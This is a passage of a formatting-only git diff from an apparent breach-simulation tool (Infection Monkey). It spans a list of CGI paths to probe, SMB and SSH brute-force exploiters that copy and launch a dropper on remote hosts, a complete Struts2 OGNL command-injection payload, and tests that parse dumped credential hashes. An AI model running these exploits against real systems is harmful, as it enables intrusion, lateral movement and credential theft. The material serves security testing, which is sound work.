r"/cgi-bin/ikonboard/help.cgi", + r"/cgi-bin/ImageFolio/admin/admin.cgi", + r"/cgi-bin/imageFolio.cgi", + r"/cgi-bin/index.cgi", + r"/cgi-bin/infosrch.cgi", + r"/cgi-bin/jammail.pl", + r"/cgi-bin/journal.cgi", + r"/cgi-bin/lastlines.cgi", + r"/cgi-bin/loadpage.cgi", + r"/cgi-bin/login.cgi", + r"/cgi-bin/logit.cgi", + r"/cgi-bin/log-reader.cgi", + r"/cgi-bin/lookwho.cgi", + r"/cgi-bin/lwgate.cgi", + r"/cgi-bin/MachineInfo", + r"/cgi-bin/MachineInfo", + r"/cgi-bin/magiccard.cgi", + r"/cgi-bin/mail/emumail.cgi", + r"/cgi-bin/maillist.cgi", + r"/cgi-bin/mailnews.cgi", + r"/cgi-bin/mail/nph-mr.cgi", + r"/cgi-bin/main.cgi", + r"/cgi-bin/main_menu.pl", + r"/cgi-bin/man.sh", + r"/cgi-bin/mini_logger.cgi", + r"/cgi-bin/mmstdod.cgi", + r"/cgi-bin/moin.cgi", + r"/cgi-bin/mojo/mojo.cgi", + r"/cgi-bin/mrtg.cgi", + r"/cgi-bin/mt.cgi", + r"/cgi-bin/mt/mt.cgi", + r"/cgi-bin/mt/mt-check.cgi", + r"/cgi-bin/mt/mt-load.cgi", + r"/cgi-bin/mt-static/mt-check.cgi", + r"/cgi-bin/mt-static/mt-load.cgi", + r"/cgi-bin/musicqueue.cgi", + r"/cgi-bin/myguestbook.cgi", + r"/cgi-bin/.namazu.cgi", + r"/cgi-bin/nbmember.cgi", + r"/cgi-bin/netauth.cgi", + r"/cgi-bin/netpad.cgi", + r"/cgi-bin/newsdesk.cgi", + r"/cgi-bin/nlog-smb.cgi", + r"/cgi-bin/nph-emumail.cgi", + r"/cgi-bin/nph-exploitscanget.cgi", + r"/cgi-bin/nph-publish.cgi", + r"/cgi-bin/nph-test.cgi", + r"/cgi-bin/pagelog.cgi", + r"/cgi-bin/pbcgi.cgi", + r"/cgi-bin/perlshop.cgi", + r"/cgi-bin/pfdispaly.cgi", + r"/cgi-bin/pfdisplay.cgi", + r"/cgi-bin/phf.cgi", + r"/cgi-bin/photo/manage.cgi", + r"/cgi-bin/photo/protected/manage.cgi", + r"/cgi-bin/php-cgi", + r"/cgi-bin/php.cgi", + r"/cgi-bin/php.fcgi", + r"/cgi-bin/ping.sh", + r"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi", + r"/cgi-bin/pollssi.cgi", + r"/cgi-bin/postcards.cgi", + r"/cgi-bin/powerup/r.cgi", + r"/cgi-bin/printenv", + r"/cgi-bin/probecontrol.cgi", + r"/cgi-bin/profile.cgi", + r"/cgi-bin/publisher/search.cgi", + r"/cgi-bin/quickstore.cgi", + r"/cgi-bin/quizme.cgi", + r"/cgi-bin/ratlog.cgi", + r"/cgi-bin/r.cgi", + r"/cgi-bin/register.cgi", + r"/cgi-bin/replicator/webpage.cgi/", + r"/cgi-bin/responder.cgi", + r"/cgi-bin/robadmin.cgi", + r"/cgi-bin/robpoll.cgi", + r"/cgi-bin/rtpd.cgi", + r"/cgi-bin/sbcgi/sitebuilder.cgi", + r"/cgi-bin/scoadminreg.cgi", + r"/cgi-bin-sdb/printenv", + r"/cgi-bin/sdbsearch.cgi", + r"/cgi-bin/search", + r"/cgi-bin/search.cgi", + r"/cgi-bin/search/search.cgi", + r"/cgi-bin/sendform.cgi", + r"/cgi-bin/shop.cgi", + r"/cgi-bin/shopper.cgi", + r"/cgi-bin/shopplus.cgi", + r"/cgi-bin/showcheckins.cgi", + r"/cgi-bin/simplestguest.cgi", + r"/cgi-bin/simplestmail.cgi", + r"/cgi-bin/smartsearch.cgi", + r"/cgi-bin/smartsearch/smartsearch.cgi", + r"/cgi-bin/snorkerz.bat", + r"/cgi-bin/snorkerz.bat", + r"/cgi-bin/snorkerz.cmd", + r"/cgi-bin/snorkerz.cmd", + r"/cgi-bin/sojourn.cgi", + r"/cgi-bin/spin_client.cgi", + r"/cgi-bin/start.cgi", + r"/cgi-bin/status", + r"/cgi-bin/status_cgi", + r"/cgi-bin/store/agora.cgi", + r"/cgi-bin/store.cgi", + r"/cgi-bin/store/index.cgi", + r"/cgi-bin/survey.cgi", + r"/cgi-bin/sync.cgi", + r"/cgi-bin/talkback.cgi", + r"/cgi-bin/technote/main.cgi", + r"/cgi-bin/test2.pl", + r"/cgi-bin/test-cgi", + r"/cgi-bin/test.cgi", + r"/cgi-bin/testing_whatever", + r"/cgi-bin/test/test.cgi", + r"/cgi-bin/tidfinder.cgi", + r"/cgi-bin/tigvote.cgi", + r"/cgi-bin/title.cgi", + r"/cgi-bin/top.cgi", + r"/cgi-bin/traffic.cgi", + r"/cgi-bin/troops.cgi", + r"/cgi-bin/ttawebtop.cgi/", + r"/cgi-bin/ultraboard.cgi", + r"/cgi-bin/upload.cgi", + r"/cgi-bin/urlcount.cgi", + r"/cgi-bin/viewcvs.cgi", + r"/cgi-bin/view_help.cgi", + r"/cgi-bin/viralator.cgi", + r"/cgi-bin/virgil.cgi", + r"/cgi-bin/vote.cgi", + r"/cgi-bin/vpasswd.cgi", + r"/cgi-bin/way-board.cgi", + r"/cgi-bin/way-board/way-board.cgi", + r"/cgi-bin/webbbs.cgi", + r"/cgi-bin/webcart/webcart.cgi", + r"/cgi-bin/webdist.cgi", + r"/cgi-bin/webif.cgi", + r"/cgi-bin/webmail/html/emumail.cgi", + r"/cgi-bin/webmap.cgi", + r"/cgi-bin/webspirs.cgi", + r"/cgi-bin/Web_Store/web_store.cgi", + r"/cgi-bin/whois.cgi", + r"/cgi-bin/whois_raw.cgi", + r"/cgi-bin/whois/whois.cgi", + r"/cgi-bin/wrap", + r"/cgi-bin/wrap.cgi", + r"/cgi-bin/wwwboard.cgi.cgi", + r"/cgi-bin/YaBB/YaBB.cgi", + r"/cgi-bin/zml.cgi", + r"/cgi-mod/index.cgi", + r"/cgis/wwwboard/wwwboard.cgi", + r"/cgi-sys/addalink.cgi", + r"/cgi-sys/defaultwebpage.cgi", + r"/cgi-sys/domainredirect.cgi", + r"/cgi-sys/entropybanner.cgi", + r"/cgi-sys/entropysearch.cgi", + r"/cgi-sys/FormMail-clone.cgi", + r"/cgi-sys/helpdesk.cgi", + r"/cgi-sys/mchat.cgi", + r"/cgi-sys/randhtml.cgi", + r"/cgi-sys/realhelpdesk.cgi", + r"/cgi-sys/realsignup.cgi", + r"/cgi-sys/signup.cgi", + r"/connector.cgi", + r"/cp/rac/nsManager.cgi", + r"/create_release.sh", + r"/CSNews.cgi", + r"/csPassword.cgi", + r"/dcadmin.cgi", + r"/dcboard.cgi", + r"/dcforum.cgi", + r"/dcforum/dcforum.cgi", + r"/debuff.cgi", + r"/debug.cgi", + r"/details.cgi", + r"/edittag/edittag.cgi", + r"/emumail.cgi", + r"/enter_buff.cgi", + r"/enter_bug.cgi", + r"/ez2000/ezadmin.cgi", + r"/ez2000/ezboard.cgi", + r"/ez2000/ezman.cgi", + r"/fcgi-bin/echo", + r"/fcgi-bin/echo", + r"/fcgi-bin/echo2", + r"/fcgi-bin/echo2", + r"/Gozila.cgi", + r"/hitmatic/analyse.cgi", + r"/hp_docs/cgi-bin/index.cgi", + r"/html/cgi-bin/cgicso", + r"/html/cgi-bin/cgicso", + r"/index.cgi", + r"/info.cgi", + r"/infosrch.cgi", + r"/login.cgi", + r"/mailview.cgi", + r"/main.cgi", + r"/megabook/admin.cgi", + r"/ministats/admin.cgi", + r"/mods/apage/apage.cgi", + r"/_mt/mt.cgi", + r"/musicqueue.cgi", + r"/ncbook.cgi", + r"/newpro.cgi", + r"/newsletter.sh", + r"/oem_webstage/cgi-bin/oemapp_cgi", + r"/page.cgi", + r"/parse_xml.cgi", + r"/photodata/manage.cgi", + r"/photo/manage.cgi", + r"/print.cgi", + r"/process_buff.cgi", + r"/process_bug.cgi", + r"/pub/english.cgi", + r"/quikmail/nph-emumail.cgi", + r"/quikstore.cgi", + r"/reviews/newpro.cgi", + r"/ROADS/cgi-bin/search.pl", + r"/sample01.cgi", + r"/sample02.cgi", + r"/sample03.cgi", + r"/sample04.cgi", + r"/sampleposteddata.cgi", + r"/scancfg.cgi", + r"/scancfg.cgi", + r"/servers/link.cgi", + r"/setpasswd.cgi", + r"/SetSecurity.shm", + r"/shop/member_html.cgi", + r"/shop/normal_html.cgi", + r"/site_searcher.cgi", + r"/siteUserMod.cgi", + r"/submit.cgi", + r"/technote/print.cgi", + r"/template.cgi", + r"/test.cgi", + r"/ucsm/isSamInstalled.cgi", + r"/upload.cgi", + r"/userreg.cgi", + r"/users/scripts/submit.cgi", + r"/vood/cgi-bin/vood_view.cgi", + r"/Web_Store/web_store.cgi", + r"/webtools/bonsai/ccvsblame.cgi", + r"/webtools/bonsai/cvsblame.cgi", + r"/webtools/bonsai/cvslog.cgi", + r"/webtools/bonsai/cvsquery.cgi", + r"/webtools/bonsai/cvsqueryform.cgi", + r"/webtools/bonsai/showcheckins.cgi", + r"/wwwadmin.cgi", + r"/wwwboard.cgi", + r"/wwwboard/wwwboard.cgi", ) diff --git a/monkey/infection_monkey/exploit/smbexec.py b/monkey/infection_monkey/exploit/smbexec.py index c6e2424c1..4b5e941f8 100644 --- a/monkey/infection_monkey/exploit/smbexec.py +++ b/monkey/infection_monkey/exploit/smbexec.py @@ -5,10 +5,13 @@ from impacket.dcerpc.v5 import scmr, transport from common.utils.attack_utils import ScanStatus, UsageEnum from common.utils.exploit_enum import ExploitType from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey, +) from infection_monkey.exploit.tools.smb_tools import SmbTools -from infection_monkey.model import (DROPPER_CMDLINE_DETACHED_WINDOWS, - MONKEY_CMDLINE_DETACHED_WINDOWS) +from infection_monkey.model import DROPPER_CMDLINE_DETACHED_WINDOWS, MONKEY_CMDLINE_DETACHED_WINDOWS from infection_monkey.network.smbfinger import SMBFinger from infection_monkey.network.tools import check_tcp_port from infection_monkey.telemetry.attack.t1035_telem import T1035Telem @@ -17,12 +20,12 @@ LOG = getLogger(__name__) class SmbExploiter(HostExploiter): - _TARGET_OS_TYPE = ['windows'] + _TARGET_OS_TYPE = ["windows"] EXPLOIT_TYPE = ExploitType.BRUTE_FORCE - _EXPLOITED_SERVICE = 'SMB' + _EXPLOITED_SERVICE = "SMB" KNOWN_PROTOCOLS = { - '139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139), - '445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445), + "139/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 139), + "445/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 445), } USE_KERBEROS = False @@ -34,7 +37,7 @@ class SmbExploiter(HostExploiter): if super(SmbExploiter, self).is_os_supported(): return True - if not self.host.os.get('type'): + if not self.host.os.get("type"): is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445) if is_smb_open: smb_finger = SMBFinger() @@ -42,8 +45,8 @@ class SmbExploiter(HostExploiter): else: is_nb_open, _ = check_tcp_port(self.host.ip_addr, 139) if is_nb_open: - self.host.os['type'] = 'windows' - return self.host.os.get('type') in self._TARGET_OS_TYPE + self.host.os["type"] = "windows" + return self.host.os.get("type") in self._TARGET_OS_TYPE return False def _exploit_host(self): @@ -59,25 +62,34 @@ class SmbExploiter(HostExploiter): for user, password, lm_hash, ntlm_hash in creds: try: # copy the file remotely using SMB - remote_full_path = SmbTools.copy_file(self.host, - src_path, - self._config.dropper_target_path_win_32, - user, - password, - lm_hash, - ntlm_hash, - self._config.smb_download_timeout) + remote_full_path = SmbTools.copy_file( + self.host, + src_path, + self._config.dropper_target_path_win_32, + user, + password, + lm_hash, + ntlm_hash, + self._config.smb_download_timeout, + ) if remote_full_path is not None: - LOG.debug("Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)", - self.host, - user, - self._config.hash_sensitive_data(password), - self._config.hash_sensitive_data(lm_hash), - self._config.hash_sensitive_data(ntlm_hash)) + LOG.debug( + "Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)", + self.host, + user, + self._config.hash_sensitive_data(password), + self._config.hash_sensitive_data(lm_hash), + self._config.hash_sensitive_data(ntlm_hash), + ) self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) - self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1], - SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1])) + self.add_vuln_port( + "%s or %s" + % ( + SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1], + SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1], + ) + ) exploited = True break else: @@ -93,7 +105,8 @@ class SmbExploiter(HostExploiter): self._config.hash_sensitive_data(password), self._config.hash_sensitive_data(lm_hash), self._config.hash_sensitive_data(ntlm_hash), - exc) + exc, + ) continue if not exploited: @@ -103,24 +116,29 @@ class SmbExploiter(HostExploiter): self.set_vulnerable_port() # execute the remote dropper in case the path isn't final if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): - cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \ - build_monkey_commandline(self.host, get_monkey_depth() - 1, - self.vulnerable_port, - self._config.dropper_target_path_win_32) + cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % { + "dropper_path": remote_full_path + } + build_monkey_commandline( + self.host, + get_monkey_depth() - 1, + self.vulnerable_port, + self._config.dropper_target_path_win_32, + ) else: - cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \ - build_monkey_commandline(self.host, - get_monkey_depth() - 1, - vulnerable_port=self.vulnerable_port) + cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % { + "monkey_path": remote_full_path + } + build_monkey_commandline( + self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port + ) smb_conn = False for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values(): rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,)) rpctransport.set_dport(port) rpctransport.setRemoteHost(self.host.ip_addr) - if hasattr(rpctransport, 'set_credentials'): + if hasattr(rpctransport, "set_credentials"): # This method exists only for selected protocol sequences. - rpctransport.set_credentials(user, password, '', lm_hash, ntlm_hash, None) + rpctransport.set_credentials(user, password, "", lm_hash, ntlm_hash, None) rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS) scmr_rpc = rpctransport.get_dce_rpc() @@ -128,7 +146,12 @@ class SmbExploiter(HostExploiter): try: scmr_rpc.connect() except Exception as exc: - LOG.debug("Can't connect to SCM on exploited machine %r port %s : %s", self.host, port, exc) + LOG.debug( + "Can't connect to SCM on exploited machine %r port %s : %s", + self.host, + port, + exc, + ) continue smb_conn = rpctransport.get_smb_connection() @@ -140,12 +163,17 @@ class SmbExploiter(HostExploiter): smb_conn.setTimeout(100000) scmr_rpc.bind(scmr.MSRPC_UUID_SCMR) resp = scmr.hROpenSCManagerW(scmr_rpc) - sc_handle = resp['lpScHandle'] + sc_handle = resp["lpScHandle"] # start the monkey using the SCM - resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, self._config.smb_service_name, self._config.smb_service_name, - lpBinaryPathName=cmdline) - service = resp['lpServiceHandle'] + resp = scmr.hRCreateServiceW( + scmr_rpc, + sc_handle, + self._config.smb_service_name, + self._config.smb_service_name, + lpBinaryPathName=cmdline, + ) + service = resp["lpServiceHandle"] try: scmr.hRStartServiceW(scmr_rpc, service) status = ScanStatus.USED @@ -156,17 +184,26 @@ class SmbExploiter(HostExploiter): scmr.hRDeleteService(scmr_rpc, service) scmr.hRCloseServiceHandle(scmr_rpc, service) - LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", - remote_full_path, self.host, cmdline) + LOG.info( + "Executed monkey '%s' on remote victim %r (cmdline=%r)", + remote_full_path, + self.host, + cmdline, + ) - self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1], - SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1])) + self.add_vuln_port( + "%s or %s" + % ( + SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1], + SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1], + ) + ) return True def set_vulnerable_port(self): - if 'tcp-445' in self.host.services: + if "tcp-445" in self.host.services: self.vulnerable_port = "445" - elif 'tcp-139' in self.host.services: + elif "tcp-139" in self.host.services: self.vulnerable_port = "139" else: self.vulnerable_port = None diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py index b96a6c2b6..0f5af3258 100644 --- a/monkey/infection_monkey/exploit/sshexec.py +++ b/monkey/infection_monkey/exploit/sshexec.py @@ -9,13 +9,17 @@ from common.utils.attack_utils import ScanStatus from common.utils.exceptions import FailedExploitationError from common.utils.exploit_enum import ExploitType from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey, +) from infection_monkey.model import MONKEY_ARG from infection_monkey.network.tools import check_tcp_port, get_interface_to_target from infection_monkey.telemetry.attack.t1105_telem import T1105Telem from infection_monkey.telemetry.attack.t1222_telem import T1222Telem -__author__ = 'hoffer' +__author__ = "hoffer" LOG = logging.getLogger(__name__) SSH_PORT = 22 @@ -23,9 +27,9 @@ TRANSFER_UPDATE_RATE = 15 class SSHExploiter(HostExploiter): - _TARGET_OS_TYPE = ['linux', None] + _TARGET_OS_TYPE = ["linux", None] EXPLOIT_TYPE = ExploitType.BRUTE_FORCE - _EXPLOITED_SERVICE = 'SSH' + _EXPLOITED_SERVICE = "SSH" def __init__(self, host): super(SSHExploiter, self).__init__(host) @@ -42,29 +46,27 @@ class SSHExploiter(HostExploiter): for user, ssh_key_pair in user_ssh_key_pairs: # Creating file-like private key for paramiko - pkey = io.StringIO(ssh_key_pair['private_key']) - ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip']) + pkey = io.StringIO(ssh_key_pair["private_key"]) + ssh_string = "%s@%s" % (ssh_key_pair["user"], ssh_key_pair["ip"]) ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.WarningPolicy()) try: pkey = paramiko.RSAKey.from_private_key(pkey) - except(IOError, paramiko.SSHException, paramiko.PasswordRequiredException): + except (IOError, paramiko.SSHException, paramiko.PasswordRequiredException): LOG.error("Failed reading ssh key") try: - ssh.connect(self.host.ip_addr, - username=user, - pkey=pkey, - port=port) - LOG.debug("Successfully logged in %s using %s users private key", - self.host, ssh_string) + ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port) + LOG.debug( + "Successfully logged in %s using %s users private key", self.host, ssh_string + ) self.report_login_attempt(True, user, ssh_key=ssh_string) return ssh except Exception: ssh.close() - LOG.debug("Error logging into victim %r with %s" - " private key", self.host, - ssh_string) + LOG.debug( + "Error logging into victim %r with %s" " private key", self.host, ssh_string + ) self.report_login_attempt(False, user, ssh_key=ssh_string) continue raise FailedExploitationError @@ -77,21 +79,27 @@ class SSHExploiter(HostExploiter): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.WarningPolicy()) try: - ssh.connect(self.host.ip_addr, - username=user, - password=current_password, - port=port) + ssh.connect(self.host.ip_addr, username=user, password=current_password, port=port) - LOG.debug("Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)", - self.host, user, self._config.hash_sensitive_data(current_password)) + LOG.debug( + "Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)", + self.host, + user, + self._config.hash_sensitive_data(current_password), + ) self.add_vuln_port(port) self.report_login_attempt(True, user, current_password) return ssh except Exception as exc: - LOG.debug("Error logging into victim %r with user" - " %s and password (SHA-512) '%s': (%s)", self.host, - user, self._config.hash_sensitive_data(current_password), exc) + LOG.debug( + "Error logging into victim %r with user" + " %s and password (SHA-512) '%s': (%s)", + self.host, + user, + self._config.hash_sensitive_data(current_password), + exc, + ) self.report_login_attempt(False, user, current_password) ssh.close() continue @@ -102,8 +110,8 @@ class SSHExploiter(HostExploiter): port = SSH_PORT # if ssh banner found on different port, use that port. for servkey, servdata in list(self.host.services.items()): - if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'): - port = int(servkey.replace('tcp-', '')) + if servdata.get("name") == "ssh" and servkey.startswith("tcp-"): + port = int(servkey.replace("tcp-", "")) is_open, _ = check_tcp_port(self.host.ip_addr, port) if not is_open: @@ -119,12 +127,12 @@ class SSHExploiter(HostExploiter): LOG.debug("Exploiter SSHExploiter is giving up...") return False - if not self.host.os.get('type'): + if not self.host.os.get("type"): try: - _, stdout, _ = ssh.exec_command('uname -o') + _, stdout, _ = ssh.exec_command("uname -o") uname_os = stdout.read().lower().strip().decode() - if 'linux' in uname_os: - self.host.os['type'] = 'linux' + if "linux" in uname_os: + self.host.os["type"] = "linux" else: LOG.info("SSH Skipping unknown os: %s", uname_os) return False @@ -132,21 +140,25 @@ class SSHExploiter(HostExploiter): LOG.debug("Error running uname os command on victim %r: (%s)", self.host, exc) return False - if not self.host.os.get('machine'): + if not self.host.os.get("machine"): try: - _, stdout, _ = ssh.exec_command('uname -m') + _, stdout, _ = ssh.exec_command("uname -m") uname_machine = stdout.read().lower().strip().decode() - if '' != uname_machine: - self.host.os['machine'] = uname_machine + if "" != uname_machine: + self.host.os["machine"] = uname_machine except Exception as exc: LOG.debug("Error running uname machine command on victim %r: (%s)", self.host, exc) if self.skip_exist: - _, stdout, stderr = ssh.exec_command("head -c 1 %s" % self._config.dropper_target_path_linux) + _, stdout, stderr = ssh.exec_command( + "head -c 1 %s" % self._config.dropper_target_path_linux + ) stdout_res = stdout.read().strip() if stdout_res: # file exists - LOG.info("Host %s was already infected under the current configuration, done" % self.host) + LOG.info( + "Host %s was already infected under the current configuration, done" % self.host + ) return True # return already infected src_path = get_target_monkey(self.host) @@ -160,33 +172,44 @@ class SSHExploiter(HostExploiter): self._update_timestamp = time.time() with monkeyfs.open(src_path) as file_obj: - ftp.putfo(file_obj, self._config.dropper_target_path_linux, file_size=monkeyfs.getsize(src_path), - callback=self.log_transfer) + ftp.putfo( + file_obj, + self._config.dropper_target_path_linux, + file_size=monkeyfs.getsize(src_path), + callback=self.log_transfer, + ) ftp.chmod(self._config.dropper_target_path_linux, 0o777) status = ScanStatus.USED - T1222Telem(ScanStatus.USED, "chmod 0777 %s" % self._config.dropper_target_path_linux, self.host).send() + T1222Telem( + ScanStatus.USED, + "chmod 0777 %s" % self._config.dropper_target_path_linux, + self.host, + ).send() ftp.close() except Exception as exc: LOG.debug("Error uploading file into victim %r: (%s)", self.host, exc) status = ScanStatus.SCANNED - T1105Telem(status, - get_interface_to_target(self.host.ip_addr), - self.host.ip_addr, - src_path).send() + T1105Telem( + status, get_interface_to_target(self.host.ip_addr), self.host.ip_addr, src_path + ).send() if status == ScanStatus.SCANNED: return False try: cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG) - cmdline += build_monkey_commandline(self.host, - get_monkey_depth() - 1, - vulnerable_port=SSH_PORT) + cmdline += build_monkey_commandline( + self.host, get_monkey_depth() - 1, vulnerable_port=SSH_PORT + ) cmdline += " > /dev/null 2>&1 &" ssh.exec_command(cmdline) - LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", - self._config.dropper_target_path_linux, self.host, cmdline) + LOG.info( + "Executed monkey '%s' on remote victim %r (cmdline=%r)", + self._config.dropper_target_path_linux, + self.host, + cmdline, + ) ssh.close() self.add_executed_cmd(cmdline) diff --git a/monkey/infection_monkey/exploit/struts2.py b/monkey/infection_monkey/exploit/struts2.py index 9aba749a7..c08c174fb 100644 --- a/monkey/infection_monkey/exploit/struts2.py +++ b/monkey/infection_monkey/exploit/struts2.py @@ -21,15 +21,15 @@ DOWNLOAD_TIMEOUT = 300 class Struts2Exploiter(WebRCE): - _TARGET_OS_TYPE = ['linux', 'windows'] - _EXPLOITED_SERVICE = 'Struts2' + _TARGET_OS_TYPE = ["linux", "windows"] + _EXPLOITED_SERVICE = "Struts2" def __init__(self, host): super(Struts2Exploiter, self).__init__(host, None) def get_exploit_config(self): exploit_config = super(Struts2Exploiter, self).get_exploit_config() - exploit_config['dropper'] = True + exploit_config["dropper"] = True return exploit_config def build_potential_urls(self, ports, extensions=None): @@ -47,10 +47,12 @@ class Struts2Exploiter(WebRCE): @staticmethod def get_redirected(url): # Returns false if url is not right - headers = {'User-Agent': 'Mozilla/5.0'} + headers = {"User-Agent": "Mozilla/5.0"} request = urllib.request.Request(url, headers=headers) try: - return urllib.request.urlopen(request, context=ssl._create_unverified_context()).geturl() + return urllib.request.urlopen( + request, context=ssl._create_unverified_context() + ).geturl() except urllib.error.URLError: LOG.error("Can't reach struts2 server") return False @@ -63,24 +65,26 @@ class Struts2Exploiter(WebRCE): """ cmd = re.sub(r"\\", r"\\\\", cmd) cmd = re.sub(r"'", r"\\'", cmd) - payload = "%%{(#_='multipart/form-data')." \ - "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ - "(#_memberAccess?" \ - "(#_memberAccess=#dm):" \ - "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \ - "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \ - "(#ognlUtil.getExcludedPackageNames().clear())." \ - "(#ognlUtil.getExcludedClasses().clear())." \ - "(#context.setMemberAccess(#dm))))." \ - "(#cmd='%s')." \ - "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." \ - "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ - "(#p=new java.lang.ProcessBuilder(#cmds))." \ - "(#p.redirectErrorStream(true)).(#process=#p.start())." \ - "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \ - "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \ - "(#ros.flush())}" % cmd - headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload} + payload = ( + "%%{(#_='multipart/form-data')." + "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." + "(#_memberAccess?" + "(#_memberAccess=#dm):" + "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." + "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." + "(#ognlUtil.getExcludedPackageNames().clear())." + "(#ognlUtil.getExcludedClasses().clear())." + "(#context.setMemberAccess(#dm))))." + "(#cmd='%s')." + "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." + "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." + "(#p=new java.lang.ProcessBuilder(#cmds))." + "(#p.redirectErrorStream(true)).(#process=#p.start())." + "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." + "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." + "(#ros.flush())}" % cmd + ) + headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload} try: request = urllib.request.Request(url, headers=headers) # Timeout added or else we would wait for all monkeys' output diff --git a/monkey/infection_monkey/exploit/tests/test_zerologon.py b/monkey/infection_monkey/exploit/tests/test_zerologon.py index efc8a75e2..b4a0833ce 100644 --- a/monkey/infection_monkey/exploit/tests/test_zerologon.py +++ b/monkey/infection_monkey/exploit/tests/test_zerologon.py @@ -28,9 +28,7 @@ def zerologon_exploiter_object(monkeypatch): def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object): dummy_exploit_attempt_result = {"ErrorCode": 0} - assert zerologon_exploiter_object.assess_exploit_attempt_result( - dummy_exploit_attempt_result - ) + assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result) def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object): @@ -56,8 +54,7 @@ def test_assess_restoration_attempt_result_not_restored(zerologon_exploiter_obje def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object): mock_dumped_secrets = [ - f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::" - for i in range(len(USERS)) + f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS)) ] expected_extracted_creds = { USERS[0]: { @@ -71,24 +68,17 @@ def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object): "nt_hash": NT_HASHES[1], }, } - assert ( - zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) - is None - ) + assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds def test__extract_user_creds_from_secrets_bad_data(zerologon_exploiter_object): mock_dumped_secrets = [ - f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::" - for i in range(len(USERS)) + f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS)) ] expected_extracted_creds = { USERS[0]: {"RID": int(RIDS[0]), "lm_hash": "", "nt_hash": ""}, USERS[1]: {"RID": int(RIDS[1]), "lm_hash": "", "nt_hash": ""}, } - assert ( - zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) - is None - ) + assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None assert 